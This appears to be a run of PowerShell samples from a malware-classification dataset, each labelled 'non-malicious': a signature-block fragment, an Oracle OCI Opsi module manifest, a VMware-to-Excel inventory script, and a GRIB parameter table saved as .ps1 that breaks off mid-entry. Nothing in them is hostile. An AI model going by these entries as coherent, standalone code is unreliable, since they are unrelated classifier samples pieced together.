QAQkllKsI+UJqGq9rmRABJz5lHKTFYmFwcM52KWWjNx3z6odwz2h+sxaxewToe9G # qtDx3/aU+yqNRcB8w0tSXUf+ylN4uk5xHEpLpx+ZNNsCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBTfRqQzP3m9PZWuLf1p8/meFfkmmDAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAN0ajafILeL6SQIMIMAXM1Qd6xaoci2mOrpR8vKWyyTsL3b83A7XGLiAb # QxTrqnXvVWWeNst5YQD8saO+UTgOLJdTdfUADhLXoK+RlwjfndimIJT9MH9tUYXL # zJXKhZM09ouPwNsrn8YOLIpdAi5TPyN8Cl11OGZSlP9r8JnvomW00AoJ4Pl9rlg0 # G5lcQknAXqHa9nQdWp1ZxXqNd+0JsKmlR8tcANX33ClM9NnaClJExLQHiKeHUUWt # qyLMl65TW6wRM7XlF7Y+PTnC8duNWn4uLng+ON/Z39GO6qBj7IEZxoq4o3avEh9b # a43UU6TgzVZaBm8VaA0wSwUe/pqpTOYFWN62XL3gl/JC2pzfIPxP66XfRLIxafjB # VXm8KVDn2cML9IvRK02s941Y5+RR4gSAOhLiQQ6A03VNRup+spMa0k+XTPAi+2aM # H5xa1Zjb/K8u9f9M05U0/bUMJXJDP++ysWpJbVRDiHG7szaca+r3HiUPjQJyQl2N # iOcYTGV/DcLrLCBK2zG503FGb04N5Kf10XgAwFaXlod5B9eKh95PnXKx2LNBgLwG # 85anlhhGxxBQ5mFsJGkBn0PZPtAzZyfr96qxzpp2pH9DJJcjKCDrMmZziXazpa5V # VN36CO1kDU4ABkSYTXOM8RmJXuQm7mUF3bWmj+hjAJb4pz6hT5UwggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjozNjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAb28KDG/xXbNB # jmM7/nqw3bgrEOaggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJsSYwIhgPMjAyNDEwMjgwNjQzNTBaGA8yMDI0 # MTAyOTA2NDM1MFowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6smxJgIBADAHAgEA # AgIPIDAHAgEAAgIT5zAKAgUA6ssCpgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgor # BgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUA # A4IBAQBaN24RfbEDYuiZzqm7A4pV5f2hpp1MXvQiKNCPCo6auhWTBxhWvoAFA2Yd # uik5ad6IJA7n3eXZZvkfovjXUeUfclz34hSqlUveVGitbm3K9Awqnk2tZGgk9Li0 # GfRa6QSb/KpHS+RGIAeRp0zHfzfqy/SmE6GTQFacpa8KRg7boj/ktDUBq0kkQ578 # OFTecSrudpM+HrP9rwuxbsGhVUoCOEsKOp0WdtzSXBlryAdgyGP1izHSW9Tc92oI # /x2UnsP+/eCeuyNqOYe6VBjwFFzrSlLoVp2/o4gAiafzJbJpD2LXbW7P8MOkaTRN # ky50Lo7MnEMgN3LQB6Hb4jUX9rCAMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAH3WCB1BMr7wvQAAQAAAfcwDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQgVyt16uf3vh8Za1ghxe2l6Yt4fFgOglT8ov3ZpMhXcfAwgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCAh2pjaa3ca0ecYuhu60uYHP/IKnPbedbVQJ5So # IH5Z4jCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # 91ggdQTK+8L0AAEAAAH3MCIEIGH07306AH18MQdXDVR9dHZ+mbda9Lv03oh+XI/b # gvEVMA0GCSqGSIb3DQEBCwUABIICAJQk2RlniLQwnt+3JYQA/vN7NHAPXfv3aEkE # ozgSCYPoPHv/qmseiaAhhzHgp/NcG2zrlilJjfpGdXqU6fR6dCSw11lhjOFfRG7q # 5gXZ/k4jKYeu2Q0Fm7WWKopgn4f/Gtp49HRgwexnOVdE+g8d2pTf6O2FbxtuIN74 # tpfBpZz0z1L4FwOwnL/2+iBMJX54k74+IyNkck1XmIc0POPcITJfhwG81PneaLgV # 9zwa9Fr2LYljbwKp+Q9hlapWE+RNgKxozKilB0ASRxaDoBDfbWPOd+zEeLqTYJ6h # Qge6r1V7EkqspgP9OCLpEAYfZYV6b233ra9BWaMZTGsaClNjFfO4UnJkhg5hA2WT # WunPTe1GldzBeXuaeEyhJpNlSO+baw4UANo0L7wgs1POWJMCwgGH6PIm2cupguAk # 8X8HVar0SwweKFpQZD+JUqUJymEQ4nblCuIvr7x9YXuk8HUiIh9Zcp5fRQCAhPZy # rj8T8iwaFpyV6N1CgIZ3TC9oaMvk5AGbhlk8iNXVnnu21JpXx0rBVwkNKMd79Q7a # P5GYUbPxlRL3Evnmp8QKhF2fieuAW6/GV+mtWfpJMCfWR8Ql1LfOesac1wYgvFXs # deLLv5+hFgnvQ3HyP3L86aBEkjEz1ZOafZ7tASCAHe01L/azUmScK9GCzUEvyXYv # LAE6Wpkj # SIG # End signature block
combined_dataset/train/non-malicious/sample_59_67.ps1
sample_59_67.ps1
# # Module manifest for module 'OCI.PSModules.Opsi' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Opsi.dll' # Version number of this module. ModuleVersion = '83.3.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '467f5e25-fff2-4ca2-ac74-48ebfddab98f' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Opsi Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.3.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Opsi.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Add-OCIOpsiExadataInsightMembers', 'Disable-OCIOpsiAutonomousDatabaseInsightAdvancedFeatures', 'Disable-OCIOpsiAwrHubSource', 'Disable-OCIOpsiDatabaseInsight', 'Disable-OCIOpsiExadataInsight', 'Disable-OCIOpsiHostInsight', 'Enable-OCIOpsiAutonomousDatabaseInsightAdvancedFeatures', 'Enable-OCIOpsiAwrHubSource', 'Enable-OCIOpsiDatabaseInsight', 'Enable-OCIOpsiExadataInsight', 'Enable-OCIOpsiHostInsight', 'Get-OCIOpsiAddmDbFindingCategoriesList', 'Get-OCIOpsiAddmDbFindingsTimeSeriesList', 'Get-OCIOpsiAddmDbParameterCategoriesList', 'Get-OCIOpsiAddmDbRecommendationCategoriesList', 'Get-OCIOpsiAddmDbRecommendationsTimeSeriesList', 'Get-OCIOpsiAddmDbsList', 'Get-OCIOpsiAwrDatabaseReport', 'Get-OCIOpsiAwrDatabasesList', 'Get-OCIOpsiAwrDatabaseSnapshotsList', 'Get-OCIOpsiAwrDatabaseSqlReport', 'Get-OCIOpsiAwrHub', 'Get-OCIOpsiAwrHubObject', 'Get-OCIOpsiAwrHubObjectsList', 'Get-OCIOpsiAwrHubsList', 'Get-OCIOpsiAwrHubSource', 'Get-OCIOpsiAwrHubSourcesList', 'Get-OCIOpsiAwrReport', 'Get-OCIOpsiAwrSnapshotsList', 'Get-OCIOpsiConfiguration', 'Get-OCIOpsiConfigurationsList', 'Get-OCIOpsiDatabaseConfigurationsList', 'Get-OCIOpsiDatabaseInsight', 'Get-OCIOpsiDatabaseInsightsList', 'Get-OCIOpsiDataObject', 'Get-OCIOpsiDataObjectsList', 'Get-OCIOpsiEnterpriseManagerBridge', 'Get-OCIOpsiEnterpriseManagerBridgesList', 'Get-OCIOpsiExadataConfigurationsList', 'Get-OCIOpsiExadataInsight', 'Get-OCIOpsiExadataInsightsList', 'Get-OCIOpsiHostConfigurationsList', 'Get-OCIOpsiHostedEntitiesList', 'Get-OCIOpsiHostInsight', 'Get-OCIOpsiHostInsightsList', 'Get-OCIOpsiImportableAgentEntitiesList', 'Get-OCIOpsiImportableComputeEntitiesList', 'Get-OCIOpsiImportableEnterpriseManagerEntitiesList', 'Get-OCIOpsiNewsReport', 'Get-OCIOpsiNewsReportsList', 'Get-OCIOpsiOperationsInsightsPrivateEndpoint', 'Get-OCIOpsiOperationsInsightsPrivateEndpointsList', 'Get-OCIOpsiOperationsInsightsWarehouse', 'Get-OCIOpsiOperationsInsightsWarehousesList', 'Get-OCIOpsiOperationsInsightsWarehouseUser', 'Get-OCIOpsiOperationsInsightsWarehouseUsersList', 'Get-OCIOpsiSqlPlansList', 'Get-OCIOpsiSqlSearchesList', 'Get-OCIOpsiSqlTextsList', 'Get-OCIOpsiWarehouseDataObjectsList', 'Get-OCIOpsiWorkRequest', 'Get-OCIOpsiWorkRequestErrorsList', 'Get-OCIOpsiWorkRequestLogsList', 'Get-OCIOpsiWorkRequestsList', 'Invoke-OCIOpsiDownloadOperationsInsightsWarehouseWallet', 'Invoke-OCIOpsiHeadAwrHubObject', 'Invoke-OCIOpsiIngestAddmReports', 'Invoke-OCIOpsiIngestDatabaseConfiguration', 'Invoke-OCIOpsiIngestHostConfiguration', 'Invoke-OCIOpsiIngestHostMetrics', 'Invoke-OCIOpsiIngestSqlBucket', 'Invoke-OCIOpsiIngestSqlPlanLines', 'Invoke-OCIOpsiIngestSqlStats', 'Invoke-OCIOpsiIngestSqlText', 'Invoke-OCIOpsiQueryOpsiDataObjectData', 'Invoke-OCIOpsiQueryWarehouseDataObjectData', 'Invoke-OCIOpsiRotateOperationsInsightsWarehouseWallet', 'Invoke-OCIOpsiSummarizeAddmDbFindings', 'Invoke-OCIOpsiSummarizeAddmDbParameterChanges', 'Invoke-OCIOpsiSummarizeAddmDbParameters', 'Invoke-OCIOpsiSummarizeAddmDbRecommendations', 'Invoke-OCIOpsiSummarizeAddmDbSchemaObjects', 'Invoke-OCIOpsiSummarizeAddmDbSqlStatements', 'Invoke-OCIOpsiSummarizeAwrDatabaseCpuUsages', 'Invoke-OCIOpsiSummarizeAwrDatabaseMetrics', 'Invoke-OCIOpsiSummarizeAwrDatabaseParameterChanges', 'Invoke-OCIOpsiSummarizeAwrDatabaseParameters', 'Invoke-OCIOpsiSummarizeAwrDatabaseSnapshotRanges', 'Invoke-OCIOpsiSummarizeAwrDatabaseSysstats', 'Invoke-OCIOpsiSummarizeAwrDatabaseTopWaitEvents', 'Invoke-OCIOpsiSummarizeAwrDatabaseWaitEventBuckets', 'Invoke-OCIOpsiSummarizeAwrDatabaseWaitEvents', 'Invoke-OCIOpsiSummarizeAwrSourcesSummaries', 'Invoke-OCIOpsiSummarizeConfigurationItems', 'Invoke-OCIOpsiSummarizeDatabaseInsightResourceCapacityTrend', 'Invoke-OCIOpsiSummarizeDatabaseInsightResourceForecastTrend', 'Invoke-OCIOpsiSummarizeDatabaseInsightResourceStatistics', 'Invoke-OCIOpsiSummarizeDatabaseInsightResourceUsage', 'Invoke-OCIOpsiSummarizeDatabaseInsightResourceUsageTrend', 'Invoke-OCIOpsiSummarizeDatabaseInsightResourceUtilizationInsight', 'Invoke-OCIOpsiSummarizeDatabaseInsightTablespaceUsageTrend', 'Invoke-OCIOpsiSummarizeExadataInsightResourceCapacityTrend', 'Invoke-OCIOpsiSummarizeExadataInsightResourceCapacityTrendAggregated', 'Invoke-OCIOpsiSummarizeExadataInsightResourceForecastTrend', 'Invoke-OCIOpsiSummarizeExadataInsightResourceForecastTrendAggregated', 'Invoke-OCIOpsiSummarizeExadataInsightResourceStatistics', 'Invoke-OCIOpsiSummarizeExadataInsightResourceUsage', 'Invoke-OCIOpsiSummarizeExadataInsightResourceUsageAggregated', 'Invoke-OCIOpsiSummarizeExadataInsightResourceUtilizationInsight', 'Invoke-OCIOpsiSummarizeExadataMembers', 'Invoke-OCIOpsiSummarizeHostInsightDiskStatistics', 'Invoke-OCIOpsiSummarizeHostInsightHostRecommendation', 'Invoke-OCIOpsiSummarizeHostInsightNetworkUsageTrend', 'Invoke-OCIOpsiSummarizeHostInsightResourceCapacityTrend', 'Invoke-OCIOpsiSummarizeHostInsightResourceForecastTrend', 'Invoke-OCIOpsiSummarizeHostInsightResourceStatistics', 'Invoke-OCIOpsiSummarizeHostInsightResourceUsage', 'Invoke-OCIOpsiSummarizeHostInsightResourceUsageTrend', 'Invoke-OCIOpsiSummarizeHostInsightResourceUtilizationInsight', 'Invoke-OCIOpsiSummarizeHostInsightStorageUsageTrend', 'Invoke-OCIOpsiSummarizeHostInsightTopProcessesUsage', 'Invoke-OCIOpsiSummarizeHostInsightTopProcessesUsageTrend', 'Invoke-OCIOpsiSummarizeOperationsInsightsWarehouseResourceUsage', 'Invoke-OCIOpsiSummarizeSqlInsights', 'Invoke-OCIOpsiSummarizeSqlPlanInsights', 'Invoke-OCIOpsiSummarizeSqlResponseTimeDistributions', 'Invoke-OCIOpsiSummarizeSqlStatistics', 'Invoke-OCIOpsiSummarizeSqlStatisticsTimeSeries', 'Invoke-OCIOpsiSummarizeSqlStatisticsTimeSeriesByPlan', 'Move-OCIOpsiAutonomousDatabaseInsightAdvancedFeatures', 'Move-OCIOpsiAwrHubSourceCompartment', 'Move-OCIOpsiConfigurationCompartment', 'Move-OCIOpsiDatabaseInsightCompartment', 'Move-OCIOpsiEnterpriseManagerBridgeCompartment', 'Move-OCIOpsiExadataInsightCompartment', 'Move-OCIOpsiHostInsightCompartment', 'Move-OCIOpsiNewsReportCompartment', 'Move-OCIOpsiOperationsInsightsPrivateEndpointCompartment', 'Move-OCIOpsiOperationsInsightsWarehouseCompartment', 'Move-OCIOpsiPeComanagedDatabaseInsight', 'New-OCIOpsiAwrHub', 'New-OCIOpsiAwrHubSource', 'New-OCIOpsiConfiguration', 'New-OCIOpsiDatabaseInsight', 'New-OCIOpsiEnterpriseManagerBridge', 'New-OCIOpsiExadataInsight', 'New-OCIOpsiHostInsight', 'New-OCIOpsiNewsReport', 'New-OCIOpsiOperationsInsightsPrivateEndpoint', 'New-OCIOpsiOperationsInsightsWarehouse', 'New-OCIOpsiOperationsInsightsWarehouseUser', 'Remove-OCIOpsiAwrHub', 'Remove-OCIOpsiAwrHubObject', 'Remove-OCIOpsiAwrHubSource', 'Remove-OCIOpsiConfiguration', 'Remove-OCIOpsiDatabaseInsight', 'Remove-OCIOpsiEnterpriseManagerBridge', 'Remove-OCIOpsiExadataInsight', 'Remove-OCIOpsiHostInsight', 'Remove-OCIOpsiNewsReport', 'Remove-OCIOpsiOperationsInsightsPrivateEndpoint', 'Remove-OCIOpsiOperationsInsightsWarehouse', 'Remove-OCIOpsiOperationsInsightsWarehouseUser', 'Update-OCIOpsiAwrHub', 'Update-OCIOpsiAwrHubSource', 'Update-OCIOpsiConfiguration', 'Update-OCIOpsiDatabaseInsight', 'Update-OCIOpsiEnterpriseManagerBridge', 'Update-OCIOpsiExadataInsight', 'Update-OCIOpsiHostInsight', 'Update-OCIOpsiNewsReport', 'Update-OCIOpsiOperationsInsightsPrivateEndpoint', 'Update-OCIOpsiOperationsInsightsWarehouse', 'Update-OCIOpsiOperationsInsightsWarehouseUser', 'Write-OCIOpsiAwrHubObject' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Opsi' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Get VMware Information.ps1
Get VMware Information.ps1
Get-VIServer YOURSERVER $Excel = New-Object -Com Excel.Application $Excel.visible = $True $Excel = $Excel.Workbooks.Add() $Addsheet = $Excel.sheets.Add() $Sheet = $Excel.WorkSheets.Item(1) $Sheet.Cells.Item(1,1) = "Name" $Sheet.Cells.Item(1,2) = "Power State" $Sheet.Cells.Item(1,3) = "Description" $Sheet.Cells.Item(1,4) = "Number of CPUs" $Sheet.Cells.Item(1,5) = "Memory (MB)" $WorkBook = $Sheet.UsedRange $WorkBook.Font.Bold = $True $intRow = 2 $colItems = Get-VM | Select-Object -property "Name","PowerState","Description","NumCPU","MemoryMB" foreach ($objItem in $colItems) { $Sheet.Cells.Item($intRow,1) = $objItem.Name $powerstate = $objItem.PowerState If ($PowerState -eq 1) {$power = "Powerd On"} Else {$power = "Powerd Off"} $Sheet.Cells.Item($intRow,2) = $power $Sheet.Cells.Item($intRow,3) = $objItem.Description $Sheet.Cells.Item($intRow,4) = $objItem.NumCPU $Sheet.Cells.Item($intRow,5) = $objItem.MemoryMB $intRow = $intRow + 1 } $WorkBook.EntireColumn.AutoFit() $Sheet = $Excel.WorkSheets.Item(2) $Sheet.Cells.Item(1,1) = "Name" $Sheet.Cells.Item(1,2) = "Free Space" $Sheet.Cells.Item(1,3) = "Capacity" $WorkBook = $Sheet.UsedRange $WorkBook.Font.Bold = $True $intRow = 2 $colItems = Get-Datastore | Select-Object -property "Name","FreeSpaceMB","CapacityMB" foreach ($objItem in $colItems) { $Sheet.Cells.Item($intRow,1) = $objItem.Name $Sheet.Cells.Item($intRow,2) = $objItem.FreeSpaceMB $Sheet.Cells.Item($intRow,3) = $objItem.CapacityMB $intRow = $intRow + 1 } $WorkBook.EntireColumn.AutoFit() $Sheet = $Excel.WorkSheets.Item(3) $Sheet.Cells.Item(1,1) = "Name" $Sheet.Cells.Item(1,2) = "State" $WorkBook = $Sheet.UsedRange $WorkBook.Font.Bold = $True $intRow = 2 $colItems = Get-VMhost | Select-Object -property "Name","State" foreach ($objItem in $colItems) { $Sheet.Cells.Item($intRow,1) = $objItem.Name $state = $objItem.State If ($state -eq 0) {$status = "Connected"} Else {$status = "Disconnected"} $Sheet.Cells.Item($intRow,2) = $status $intRow = $intRow + 1 } $WorkBook.EntireColumn.AutoFit()
combined_dataset/train/non-malicious/sample_39_57.ps1
sample_39_57.ps1
#Volumetric soil moisture content 'Proportion' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 9 ; } #Upper layer soil temperature 'K' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 1 ; } #Upper layer soil moisture 'kg m**-3' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 2 ; } #Lower layer soil moisture 'kg m**-3' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 3 ; } #Bottom layer soil temperature 'K' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 4 ; } #Liquid volumetric soil moisture (non-frozen) 'Proportion' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 5 ; } #Transpiration stress-onset (soil moisture) 'Proportion' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 7 ; } #Direct evaporation cease (soil moisture) 'Proportion' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 8 ; } #Soil porosity 'Proportion' = { discipline = 2 ; parameterCategory = 3 ; parameterNumber = 9 ; } #Instantaneous eastward turbulent surface stress 'N m**-2' = { discipline = 0 ; parameterCategory = 2 ; parameterNumber = 38 ; typeOfFirstFixedSurface = 1 ; } #Instantaneous northward turbulent surface stress 'N m**-2' = { discipline = 0 ; parameterCategory = 2 ; parameterNumber = 37 ; typeOfFirstFixedSurface = 1 ; } #Evaporation in the last 6 hours 'kg m**-2' = { discipline = 0 ; parameterCategory = 1 ; parameterNumber = 79 ; typeOfFirstFixedSurface = 1 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 1 ; lengthOfTimeRange = 6 ; } #Time-mean evapotranspiration rate in the last 24h 'kg m**-2 s**-1' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 39 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 0 ; lengthOfTimeRange = 24 ; } #Time-integrated potential evapotranspiration rate in the last 24h 'kg m**-2' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 40 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 1 ; lengthOfTimeRange = 24 ; } #Time-mean potential evapotranspiration rate in the last 24h 'kg m**-2 s**-1' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 40 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 0 ; lengthOfTimeRange = 24 